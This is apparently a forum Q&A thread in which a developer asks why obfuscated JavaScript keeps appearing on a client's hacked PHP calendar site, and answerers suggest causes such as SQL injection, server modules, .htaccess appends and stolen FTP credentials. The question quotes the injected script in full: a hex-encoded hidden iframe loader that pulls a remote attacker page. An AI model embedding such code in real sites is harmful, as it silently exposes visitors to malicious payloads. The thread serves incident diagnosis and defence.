client's website was attacked, eeek!

Question

Well, I guess this day had to come.

My client's website has been compromised and blacklisted by Google. When you load the main page this javascript gets automatically added to the bottom of the document:

<script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=382" style="visibility: hidden;"></'+str3+'rame>');</script></head><body><iframe src="http://kulkarnioo71.com/index.php?id=382" style="visibility: hidden;" width="1" height="1"></iframe>

I haven't dissected it just yet but it's, quite obviously, an attacker trying to pose as google analytics. What I can't wrap my head around is that if I remove EVERY SINGLE LAST BIT of HTML from the main page, to the point that index.html is an empty document, the javascript STILL gets embedded. What gives? How is that possible?

updates

• The website is a very simple calendar application, runs on a $10/month godaddy unix account, MySQL, PHP.

• It is not a local thing specific to my computer as my client was the one that called me with the problem. Also happening on all the computers I have at home (4)

I'll go run a scan on the webserver...

source identified

Well, I found out where the javascript is coming from. I had foolishly only emptied the template.html file but still ran the script through my php templating system. Apparently, SOMEHOW the code above got appended to the bottom of my index.php and main.php files. How is this possible?

A little more background:

• It is a calendar application, as mentioned above, and it is used only by my client's small company. Login is required to do anything, and only 5 or so people have accounts. I can guarantee none of them would try any shenanigans. I obviously can't guarantee someone got a hold of their information and did try shenanigans, though.
• Sadly enough, I did make this website almost 4 years ago, so I am not exactly 100% confident I protected against everything kids are trying nowadays, but I still cannot understand how an attacker could have possibly gained access to the webserver to append this javascript to my php files.

Answer 1

A rogue HTTP Module (in IIS), or whatever the equivalent is for apache could prepend, append, or perhaps even modify content for any HTTP request, even for static files. This would suggest that the server itself has been compromised.

EDIT: If you let us know what type of web server you're using, we'll be able to make more specific suggestions for troubleshooting.

Answer 2

Are you serving any content from a SQL database? It's possible that the compromise was a SQL injection attack and your site content in the database has been replaced/amended with this script/tag.

Answer 3

Are you sure the exploit isn't local on your machine and something local is injecting HTML into your webbrowser, which then causes your brower to execute the JS?

Run a reliable local scan using Spybot and preferably NOD32. If you don't want to install NOD32 because it might conflict with your current AV, you can use Stinger, which is an AV scanner that runs as a program and won't interfere or require a reboot.

Also run a scan on the web server. I also see people have been posting about this in other forums like here.

Answer 4

Are you allowing any html input from the user? Maybe it's something that isn't filtered properly .

Answer 5

Would it have something to do with the .htaccess?

php_value auto_append_file /server/path/to/my/www_root/subdir/file.ext"

Could automatically attach a file to the bottom of documents. Though if you can't identify a file with that JS, then I guess it's unlikely. Did you ever work out how they may have done it?

Answer 6

I advise that you look at your log files. Every access through the web should be logged there.

Answer 7

We have experienced a similiar problem with one of our clients about one year ago.

It turns out the client was using an FTP-client that saved it's passwords in plain-text and the system was infected with a virus that specifically scanned the system for these passwords files to overwrite the source code of the hosts saved within the file.

For more information, also take a look at http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/. You will find it very similiar to the problem you were experiencing.

The solution for us was to encourage our clients not to save passwords, or use FTP-clients that strongly encrypt passwords.